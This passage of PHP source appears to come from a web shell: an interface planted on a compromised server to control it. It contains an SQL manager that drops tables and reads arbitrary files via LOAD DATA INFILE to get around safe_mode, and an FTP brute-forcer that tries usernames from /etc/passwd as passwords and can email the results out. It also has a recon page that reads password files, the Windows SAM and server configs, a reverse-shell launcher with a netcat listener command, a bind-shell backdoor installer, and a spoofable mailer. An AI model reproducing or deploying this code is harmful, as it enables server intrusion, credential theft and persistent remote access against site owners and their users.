958echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
959}
960}
961if ($sql_tbl_act == "browse") {
962$sql_tbl_ls = abs($sql_tbl_ls);
963$sql_tbl_le = abs($sql_tbl_le);
964echo "<hr size=\"1\" noshade>";
965echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\"> ";
966$b = 0;
967for($i=0;$i<$numpages;$i++) {
968if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
969echo $i;
970if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
971if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
972else {echo " ";}
973}
974if ($i == 0) {echo "empty";}
975echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b> <input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\"> <b>To:</b> <input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\"> <input type=\"submit\" value=\"View\"></form>";
976echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>";
977echo "<tr>";
978echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
979for ($i=0;$i<mysql_num_fields($result);$i++) {
980$v = mysql_field_name($result,$i);
981if ($e[0] == "a") {$s = "d"; $m = "asc";}
982else {$s = "a"; $m = "desc";}
983echo "<td>";
984if (empty($e[0])) {$e[0] = "a";}
985if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
986else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
987echo "</td>";
988}
989echo "<td><font color=\"green\"><b>Action</b></font></td>";
990echo "</tr>";
991while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
992echo "<tr>";
993$w = "";
994$i = 0;
995foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
996if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
997echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
998$i = 0;
999foreach ($row as $k=>$v)
1000{
1001$v = htmlspecialchars($v);
1002if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
1003echo "<td>".$v."</td>";
1004$i++;
1005}
1006echo "<td>";
1007echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a> ";
1008echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a> ";
1009echo "</td>";
1010echo "</tr>";
1011}
1012mysql_free_result($result);
1013echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
1014echo "<option value=\"\">With selected:</option>";
1015echo "<option value=\"deleterow\">Delete</option>";
1016echo "</select> <input type=\"submit\" value=\"Confirm\"></form></p>";
1017}
1018}
1019else {
1020$result = mysql_query("SHOW TABLE STATUS", $sql_sock);
1021if (!$result) {echo mysql_smarterror();}
1022else
1023{
1024echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
1025$i = 0;
1026$tsize = $trows = 0;
1027while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
1028{
1029$tsize += $row["Data_length"];
1030$trows += $row["Rows"];
1031$size = view_size($row["Data_length"]);
1032echo "<tr>";
1033echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
1034echo "<td> <a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a> </td>";
1035echo "<td>".$row["Rows"]."</td>";
1036echo "<td>".$row["Type"]."</td>";
1037echo "<td>".$row["Create_time"]."</td>";
1038echo "<td>".$row["Update_time"]."</td>";
1039echo "<td>".$size."</td>";
1040echo "<td> <a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a> <a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a> <a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a> </td>";
1041echo "</tr>";
1042$i++;
1043}
1044echo "<tr bgcolor=\"000000\">";
1045echo "<td><center><b>+</b></center></td>";
1046echo "<td><center><b>".$i." table(s)</b></center></td>";
1047echo "<td><b>".$trows."</b></td>";
1048echo "<td>".$row[1]."</td>";
1049echo "<td>".$row[10]."</td>";
1050echo "<td>".$row[11]."</td>";
1051echo "<td><b>".view_size($tsize)."</b></td>";
1052echo "<td></td>";
1053echo "</tr>";
1054echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
1055echo "<option value=\"\">With selected:</option>";
1056echo "<option value=\"tbldrop\">Drop</option>";
1057echo "<option value=\"tblempty\">Empty</option>";
1058echo "<option value=\"tbldump\">Dump</option>";
1059echo "<option value=\"tblcheck\">Check table</option>";
1060echo "<option value=\"tbloptimize\">Optimize table</option>";
1061echo "<option value=\"tblrepair\">Repair table</option>";
1062echo "<option value=\"tblanalyze\">Analyze table</option>";
1063echo "</select> <input type=\"submit\" value=\"Confirm\"></form></p>";
1064mysql_free_result($result);
1065}
1066}
1067}
1068}
1069}
1070else {
1071$acts = array("","newdb","serverstatus","servervars","processes","getfile");
1072if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20"> <input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>"> <input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
1073if (!empty($sql_act)) {
1074echo "<hr size=\"1\" noshade>";
1075if ($sql_act == "newdb") {
1076echo "<b>";
1077if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
1078else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
1079}
1080if ($sql_act == "serverstatus") {
1081$result = mysql_query("SHOW STATUS", $sql_sock);
1082echo "<center><b>Server-status variables:</b><br><br>";
1083echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
1084while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
1085echo "</table></center>";
1086mysql_free_result($result);
1087}
1088if ($sql_act == "servervars") {
1089$result = mysql_query("SHOW VARIABLES", $sql_sock);
1090echo "<center><b>Server variables:</b><br><br>";
1091echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
1092while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
1093echo "</table>";
1094mysql_free_result($result);
1095}
1096if ($sql_act == "processes") {
1097if (!empty($kill)) {
1098$query = "KILL ".$kill.";";
1099$result = mysql_query($query, $sql_sock);
1100echo "<b>Process #".$kill." was killed.</b>";
1101}
1102$result = mysql_query("SHOW PROCESSLIST", $sql_sock);
1103echo "<center><b>Processes:</b><br><br>";
1104echo "<TABLE cellSpacing=0 cellPadding=2 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
1105while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
1106echo "</table>";
1107mysql_free_result($result);
1108}
1109if ($sql_act == "getfile")
1110{
1111$tmpdb = $sql_login."_tmpdb";
1112$select = mysql_select_db($tmpdb);
1113if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
1114if ($select)
1115{
1116$created = FALSE;
1117mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
1118mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
1119$result = mysql_query("SELECT * FROM tmp_file;");
1120if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
1121else
1122{
1123for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
1124$f = "";
1125while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
1126if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
1127else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
1128mysql_free_result($result);
1129mysql_query("DROP TABLE tmp_file;");
1130}
1131}
1132mysql_drop_db($tmpdb);
1133}
1134}
1135}
1136}
1137echo "</td></tr></table>\n";
1138if ($sql_sock) {
1139$affected = @mysql_affected_rows($sql_sock);
1140if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
1141echo "<tr><td><center><b>Affected rows : ".$affected."</center></td></tr>";
1142}
1143echo "</table>\n";
1144}
1145//End of SQL Manager
1146if ($act == "ftpquickbrute") {
1147echo "<center><table><tr><td class=barheader colspan=2>";
1148echo ".: Ftp Quick Brute :.</td></tr>";
1149echo "<tr><td>";
1150if ($win) { echo "Can't run on Windows!"; }
1151else {
1152function tpftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) {
1153if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
1154else {$TRUE = TRUE;}
1155if ($TRUE) {
1156$sock = @ftp_connect($host,$port,$timeout);
1157if (@ftp_login($sock,$login,$pass)) {
1158echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
1159ob_flush();
1160return TRUE;
1161}
1162}
1163}
1164if (!empty($submit)) {
1165if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
1166$fp = fopen("/etc/passwd","r");
1167if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
1168else {
1169if ($fqb_logging) {
1170if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
1171else {$fqb_logfp = FALSE;}
1172$fqb_log = "FTP Quick Brute (".$sh_name.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
1173if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
1174}
1175ob_flush();
1176$i = $success = 0;
1177$ftpquick_st = getmicrotime();
1178while(!feof($fp)) {
1179$str = explode(":",fgets($fp,2048));
1180if (tpftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) {
1181echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
1182$fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
1183if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
1184$success++;
1185ob_flush();
1186}
1187if ($i > $fqb_lenght) {break;}
1188$i++;
1189}
1190if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
1191$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
1192echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
1193$fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
1194if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
1195if ($fqb_logemail) {@mail($fqb_logemail,"".$sh_name." report",$fqb_log);}
1196fclose($fqb_logfp);
1197}
1198}
1199else {
1200$logfile = $tmpdir_logs."tpsh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
1201$logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
1202echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\">".
1203"Read first:</td><td><input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"></td></tr>".
1204"<tr><td></td><td><input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"> Users only with shell</td></tr>".
1205"<tr><td></td><td><input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked>Logging</td></tr>".
1206"<tr><td>Logging to file:</td><td><input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"></td></tr>".
1207"<tr><td>Logging to e-mail:</td><td><input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"></td></tr>".
1208"<tr><td colspan=2><input type=submit name=submit value=\"Brute\"></form>";
1209}
1210echo "</td></tr></table></center>";
1211}
1212}
1213if ($act == "d") {
1214if (!is_dir($d)) { echo "<center><b>$d is a not a Directory!</b></center>"; }
1215else {
1216echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
1217if (!$win) {
1218echo "<tr><td><b>Owner/Group</b></td><td> ";
1219$ow = posix_getpwuid(fileowner($d));
1220$gr = posix_getgrgid(filegroup($d));
1221$row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
1222}
1223echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table>";
1224}
1225}
1226if ($act == "phpinfo") {@ob_clean(); phpinfo(); tpshexit();}
1227if ($act == "security") {
1228echo "<div class=barheader>.: Server Security Information :.</div>\n".
1229"<table>\n".
1230"<tr><td>Open Base Dir</td><td>".$hopenbasedir."</td></tr>\n";
1231echo "<td>Password File</td><td>";
1232if (!$win) {
1233if ($nixpasswd) {
1234if ($nixpasswd == 1) {$nixpasswd = 0;}
1235echo "*nix /etc/passwd:<br>";
1236if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
1237if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
1238echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b> <input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\"> <b>To:</b> <input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\"> <input type=submit value=\"View\"></form><br>";
1239$i = $nixpwd_s;
1240while ($i < $nixpwd_e) {
1241$uid = posix_getpwuid($i);
1242if ($uid) {
1243$uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
1244echo join(":",$uid)."<br>";
1245}
1246$i++;
1247}
1248}
1249else {echo "<a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b>Download /etc/passwd</b></a>";}
1250}
1251else {
1252$v = $_SERVER["WINDIR"]."\repair\sam";
1253if (!file_get_contents($v)) { echo "<a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><b>Download password file</b></a>"; }
1254}
1255echo "</td></tr>\n";
1256echo "<tr><td>Config Files</td><td>\n";
1257if (!$win) {
1258$v = array(
1259array("User Domains","/etc/userdomains"),
1260array("Cpanel Config","/var/cpanel/accounting.log"),
1261array("Apache Config","/usr/local/apache/conf/httpd.conf"),
1262array("Apache Config","/etc/httpd.conf"),
1263array("Syslog Config","/etc/syslog.conf"),
1264array("Message of The Day","/etc/motd"),
1265array("Hosts","/etc/hosts")
1266);
1267$sep = "/";
1268}
1269else {
1270$windir = $_SERVER["WINDIR"];
1271$etcdir = $windir . "\system32\drivers\etc\\";
1272$v = array(
1273array("Hosts",$etcdir."hosts"),
1274array("Local Network Map",$etcdir."networks"),
1275array("LM Hosts",$etcdir."lmhosts.sam"),
1276);
1277$sep = "\\";
1278}
1279foreach ($v as $sec_arr) {
1280$sec_f = substr(strrchr($sec_arr[1], $sep), 1);
1281$sec_d = rtrim($sec_arr[1],$sec_f);
1282$sec_full = $sec_d.$sec_f;
1283$sec_d = rtrim($sec_d,$sep);
1284if (file_get_contents($sec_full)) {
1285echo " [ <a href=\"".$surl."act=f&f=$sec_f&d=".urlencode($sec_d)."&ft=txt\"><b>".$sec_arr[0]."</b></a> ] \n";
1286}
1287}
1288echo "</td></tr>";
1289
1290function displaysecinfo($name,$value) {
1291if (!empty($value)) {
1292echo "<tr><td>".$name."</td><td><pre>".wordwrap($value,100)."</pre></td></tr>\n";
1293}
1294}
1295if (!$win) {
1296displaysecinfo("OS Version",tpexec("cat /proc/version"));
1297displaysecinfo("Kernel Version",tpexec("sysctl -a | grep version"));
1298displaysecinfo("Distrib Name",tpexec("cat /etc/issue.net"));
1299displaysecinfo("Distrib Name (2)",tpexec("cat /etc/*-realise"));
1300displaysecinfo("CPU Info",tpexec("cat /proc/cpuinfo"));
1301displaysecinfo("RAM",tpexec("free -m"));
1302displaysecinfo("HDD Space",tpexec("df -h"));
1303displaysecinfo("List of Attributes",tpexec("lsattr -a"));
1304displaysecinfo("Mount Options",tpexec("cat /etc/fstab"));
1305displaysecinfo("lynx installed?",tpexec("which lynx"));
1306displaysecinfo("links installed?",tpexec("which links"));
1307displaysecinfo("GET installed?",tpexec("which GET"));
1308displaysecinfo("Where is Apache?",tpexec("whereis apache"));
1309displaysecinfo("Where is perl?",tpexec("whereis perl"));
1310displaysecinfo("Locate proftpd.conf",tpexec("locate proftpd.conf"));
1311displaysecinfo("Locate httpd.conf",tpexec("locate httpd.conf"));
1312displaysecinfo("Locate my.conf",tpexec("locate my.conf"));
1313displaysecinfo("Locate psybnc.conf",tpexec("locate psybnc.conf"));
1314}
1315else {
1316displaysecinfo("OS Version",tpexec("ver"));
1317displaysecinfo("Account Settings",tpexec("net accounts"));
1318displaysecinfo("User Accounts",tpexec("net user"));
1319}
1320echo "</table>\n";
1321}
1322if ($act == "mkfile") {
1323if ($mkfile != $d) {
1324if ($overwrite == 0) {
1325if (file_exists($mkfile)) { echo "<b>FILE EXIST:</b> $overwrite ".htmlspecialchars($mkfile); }
1326}
1327else {
1328if (!fopen($mkfile,"w")) { echo "<b>ACCESS DENIED:</b> ".htmlspecialchars($mkfile); }
1329else { $act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile); }
1330}
1331}
1332else { echo "<div class=fxerrmsg>Enter filename!</div>\r\n"; }
1333}
1334if ($act == "encoder") {
1335echo "<script language=\"javascript\">function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script>".
1336"<form name=\"encoder\" action=\"".$surl."\" method=POST>".
1337"<input type=hidden name=act value=encoder>".
1338"<center><table class=contents>".
1339"<tr><td colspan=4 class=barheader>.: Encoder :.</td>".
1340"<tr><td colspan=2>Input:</td><td><textarea name=\"encoder_input\" id=\"input\" cols=70 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br>".
1341"<input type=submit value=\"calculate\"></td></tr>".
1342"<tr><td rowspan=4>Hashes:</td>";
1343foreach(array("md5","crypt","sha1","crc32") as $v) {
1344echo "<td>".$v.":</td><td><input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly></td></tr><tr>";
1345}
1346echo "</tr>".
1347"<tr><td rowspan=2>Url:</td>".
1348"<td>urlencode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly></td></tr>".
1349"<tr><td>urldecode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly></td></tr>".
1350"<tr><td rowspan=2>Base64:</td>".
1351"<td>base64_encode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></td></tr>".
1352"<tr><td>base64_decode:</td><td>";
1353if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"Failed!\" disabled readonly>";}
1354else {
1355$debase64 = base64_decode($encoder_input);
1356$debase64 = str_replace("\0","[0]",$debase64);
1357$a = explode("\r\n",$debase64);
1358$rows = count($a);
1359$debase64 = htmlspecialchars($debase64);
1360if ($rows == 1) { echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>"; }
1361else { $rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>"; }
1362echo " <a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\">[Send to input]</a>";
1363}
1364echo "</td></tr>".
1365"<tr><td>Base convertations:</td><td>dec2hex</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
1366$c = strlen($encoder_input);
1367for($i=0;$i<$c;$i++) {
1368$hex = dechex(ord($encoder_input[$i]));
1369if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
1370elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
1371}
1372echo "\" readonly></td></tr></table></center></form>";
1373}
1374if ($act == "fsbuff") {
1375$arr_copy = $sess_data["copy"];
1376$arr_cut = $sess_data["cut"];
1377$arr = array_merge($arr_copy,$arr_cut);
1378if (count($arr) == 0) {echo "<h2><center>Buffer is empty!</center></h2>";}
1379else {
1380$fx_infohead = "File-System Buffer";
1381$ls_arr = $arr;
1382$disp_fullpath = TRUE;
1383$act = "ls";
1384}
1385}
1386if ($act == "selfremove") {
1387if (($submit == $rndcode) and ($submit != "")) {
1388if (unlink(__FILE__)) { @ob_clean(); echo "Thanks for using ".$sh_name.""; tpshexit(); }
1389else { echo "<center><b>Can't delete ".__FILE__."</b></center>"; }
1390}
1391else {
1392if (!empty($rndcode)) {echo "<b>Error: incorrect confirmation!</b>";}
1393$rnd = rand(0,9).rand(0,9).rand(0,9);
1394echo "<form action=\"".$surl."\">\n".
1395"<input type=hidden name=act value=selfremove>".
1396"<input type=hidden name=rndcode value=\"".$rnd."\">".
1397"<b>Kill-shell: ".__FILE__." <br>".
1398"<b>Are you sure? For confirmation, enter \"".$rnd."\"</b>: <input type=text name=submit> <input type=submit value=\"YES\">\n".
1399"</form>\n";
1400}
1401}
1402if ($act == "update") {
1403$ret = tpsh_getupdate(!!$confirmupdate);
1404echo "<b>".$ret."</b>";
1405if (stristr($ret,"new version")) {
1406echo "<br><br><input type=button onclick=\"location.href=''.$surl."act=update&confirmupdate=1';\" value=\"Update now\">";
1407}
1408}
1409
1410if ($act == 'backc')
1411{
1412$ip = $_SERVER["REMOTE_ADDR"];
1413$msg = $_POST['backcconnmsg'];
1414$emsg = $_POST['backcconnmsge'];
1415echo('<center><b>Back-Connection:</b></br></br><form name=form method=POST>Host:<input type=text name=backconnectip size=15 value='.$ip.'> Port: <input type=text name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>First, run NetCat on your computer using \'<b>nc -l -n -v -p '.$bc_port.'</b>\'. Then, click "Connect" once the port is listening.</center>');
1416echo $msg;
1417echo $emsg;
1418}
1419
1420
1421if ($act == 'backd'){
1422$msg = $_POST['backcconnmsg'];
1423$emsg = $_POST['backcconnmsge'];
1424echo("<center><b>Bind Shell Backdoor:</b></br></br><form name=form method=POST>
1425Bind Port: <input type='text' name='backconnectport' value='5992'>
1426<input type='hidden' name='use' value='shbd'>
1427<input type='submit' value='Install Backdoor'></form>");
1428echo("$msg");
1429echo("$emsg");
1430echo("</center>");
1431}
1432if ($act == "mler") {
1433if (!empty($submit)){
1434$headers = 'To: '.$dest_email."\r\n";
1435$headers .= 'From: '.$sender_name.' '.$sender_email."\r\n";
1436if (mail($suppmail,$sender_subj,$sender_body,$header)) {
1437echo "<center><b>Email sent!</b></center>";
1438}
1439else { echo "<center><b>Can't send email!</b></center>"; }
1440}
1441else {
1442echo "<form action=\"".$surl."\" method=POST>".
1443"<input type=hidden name=act value=mler>".
1444"<table class=contents><tr><td class=barheader colspan=2>".
1445"[ Mailer ]</td></tr>".
1446"<tr><td>Your name:</td><td><input type=\"text\" name=\"sender_name\" value=\"".htmlspecialchars($sender_name)."\"></td</tr>".
